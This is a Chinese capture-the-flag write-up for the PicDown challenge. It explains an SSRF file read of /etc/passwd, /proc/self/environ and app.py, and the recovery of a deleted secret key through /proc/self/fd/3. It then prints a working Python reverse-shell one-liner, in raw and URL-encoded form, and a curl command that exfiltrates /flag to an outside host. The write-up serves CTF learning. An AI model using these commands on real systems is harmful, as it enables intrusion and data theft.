当前位置: 首页 > news >正文

[网鼎杯 2020 白虎组]PicDown1 [反弹shell] [敏感文件路径] [文件描述符]

news 来源:原创 2025/5/20 6:22:51

 常见读取路径

/etc/passwd=====一些用户和权限还有一些乱七八糟的

/proc/self/cmdline=====包含用于开始当前进程的命令

/proc/self/cwd/app.py======当前工作目录的app.py   

/proc/self/environ=====包含了可用进程的环境变量

/proc/pid/exe =====包含了正在进程中运行的程序链接;
/proc/pid/fd/ =====这个目录包含了进程打开的每一个文件的链接;
/proc/pid/mem =====包含了进程在内存中的内容;
/proc/pid/stat =====包含了进程的状态信息;
/proc/pid/statm =====包含了进程的内存使用信息。

非预期解:url=/flag 出flag

网站功能: 

<html>
<meta http-equiv="refresh" content="0;url=http://www.baidu.com/">
</html>

网站功能:刷新界面并跳转到百度

 读取passwd

 读取环境变量

/proc/self/environ

self位置为PID:代表进程 ID(Process ID),是系统为每个正在运行的进程分配的唯一标识符

若一个进程的 ID 是 1234,那么该进程的相关信息就存储在 /proc/1234 目录下

环境变量里面的 PWD=/app  这里告诉我们这是在/app目录下进行的

该环境变量表示 当前工作目录(Present Working Directory),即进程所在的文件系统路径。

  • /app 是当前进程的根目录或应用程序的主目录(常见于容器化环境,如 Docker)。

  • 当用户在终端中执行命令时,默认操作路径即 PWD 的值。

 读取启动当前进程的完整命令

/proc/self/cmdline

读取app.py文件:

/proc/self/cwd/app.py

cwd 代表 “Current Working Directory”(当前工作目录)
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

补充一点urllib的知识

python2中urlliburlopen可以直接通过文件路径读取文件

漏洞所在处

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)

文件描述符未关闭:代码打开文件后未显式关闭,导致文件描述符在os.remove()时可能仍处于打开状态。

已删除文件的可读性:在Unix系统中,若文件被删除但有进程仍持有其文件描述符,可通过/proc访问该描述符读取内容。

正常情况下应该是用f.close()
或者用with语句自动实现文件描述符的关闭
如:

with open(SECRET_FILE) as f:
    SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)  # 确保在文件关闭后删除

关于文件描述符

文件描述符是什么:

文件描述符(File Descriptor)是操作系统分配给已打开文件的“临时编号”(类似你去银行办事时拿到的排队号码)。程序通过这个编号操作文件(读/写)。

文件描述符未关闭会发生什么:

当一个程序(如 Python 脚本)打开了一个文件(如 open("/tmp/secret.txt")),但未显式调用 f.close() 或未使用 with 语句自动关闭文件时,操作系统会认为该文件仍被占用(仍然在使用中)。此时,即使代码中调用了 os.remove(SECRET_FILE) 删除了文件,实际文件内容仍可能通过未关闭的文件描述符被读取到(其内容仍会残留在磁盘上)。

我们可以通过访问/proc/self/fd/<文件描述符>来访问某个特定的文件

怎么获取这次的文件描述符:

。。。枚举

获取key

/proc/self/fd/3

fd为文件描述符(file descriptors)

 输入key并执行命令,但是没有回显,此时考虑到反弹shell

第一种解法:python反弹shell

注意:这里的key和shell需要经过url编码!因为key中会存在+/=等符号,需要编码后才行

编码前

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0=

&shell=python -c 

'import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("xxxxxxxxx",8888));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/sh","-i"]);'

编码后 

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D
&shell=python%20%2Dc%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket%2Esocket%28socket%2EAF%5FINET%2Csocket%2ESOCK%5FSTREAM%29%3Bs%2Econnect%28%28%22xx%2Exxx%2Exxx%2Exx%22%2C8888%29%29%3Bos%2Edup2%28s%2Efileno%28%29%2C0%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C1%29%3B%20os%2Edup2%28s%2Efileno%28%29%2C2%29%3Bp%3Dsubprocess%2Ecall%28%5B%22%2Fbin%2Fsh%22%2C%22%2Di%22%5D%29%3B%27

腾讯云服务器的一些问题

第一次整服务器遇到一些困扰我的问题,浅写一下这次是怎么解决的:

问题一:端口是4567或者3333在bp中发送请求的时候一直不行,半天没回应

换成8888,我也不知道为啥我这只有8888能成功。。。明明其他端口的防火墙都放开了。。

问题二:如图,是困扰我最久的一个

8888端口已经被占用了,一查还是宝塔面板占用的,你要是把它kill掉吧,你的宝塔面板一转头又有新的进程了,怎么杀都杀不死

 杀不死咱就绕过嘛嘿嘿,宝塔面板默认端口是8888,把它改成其他的

然后8888就能正常监听啦 

问题三:怎么结束监听

无意间摁了个 control+C 然后自己结束了。。?

踏马的,终于反弹出来了,终于看到这个Connection received了。遥想当年青龙组那道note题反弹了一个星期都没反弹个p出来,激动的要掉小珍珠了 

第二种解法:curl反弹shell

注意还是要编码 还要base64编码输出,不编码就输出不出来(为啥)

/no_one_know_the_manager?key=5MMmHXw5q5FzvNFORsDKnImPBRHbcZ9MlLNHIviypt0%3D&shell=curl%20xxxx:8888/`cat%20/flag|base64`

命令自己改

本题总结: 

 

相关文章:

  • Unity 使用 Protobuf(Pb2)二进制数据全流程工具详解
  • Leetcode--151. 反转字符串中的单词(字符串+双指针---基础算法)
  • Android Compose 层叠布局(ZStack、Surface)源码深度剖析(十三)
  • Delphi语言的算法
  • 新版 React19使用 react-quill
  • 基于SpringBoot的图书借阅小程序+LW参考示例
  • mysql实例
  • CES Asia 2025赛逸展:科技浪潮中的创新与商贸盛会
  • 详解c++20的协程,自定义可等待对象,生成器详解
  • 享元模式的原理的详细解析以及使用案例。
  • 架构设计之自定义延迟双删缓存注解(上)
  • 波斯语这种RTL语言的字符串拼接问题
  • NPU上如何使能pytorch图模式
  • 【零基础入门unity游戏开发——2D篇】2D物理系统 —— 2D刚体组件(Rigidbody2D)
  • AWS AI认证考试中经常提及几个重要的工具介绍
  • SSE进阶详解
  • CentOS 7下安装PostgreSQL 15
  • 【Android Studio开发】生命周期、Activity和组件通信(上)
  • Spring——Springcloud/Spring项目加载文件配置顺序
  • .NET三层架构详解
  • 牛市早报|上市公司重大资产重组新规出炉,4月经济数据将公布
  • 李洋谈美国黑帮电影与黑帮文化
  • 气急败坏!20多名台湾艺人被台当局列为“重点核查对象”
  • 俄媒:俄乌伊斯坦布尔谈判将于北京时间今天17时30分开始
  • 夜读丨母亲为燕子打开家门
  • 董军在第六届联合国维和部长级会议上作大会发言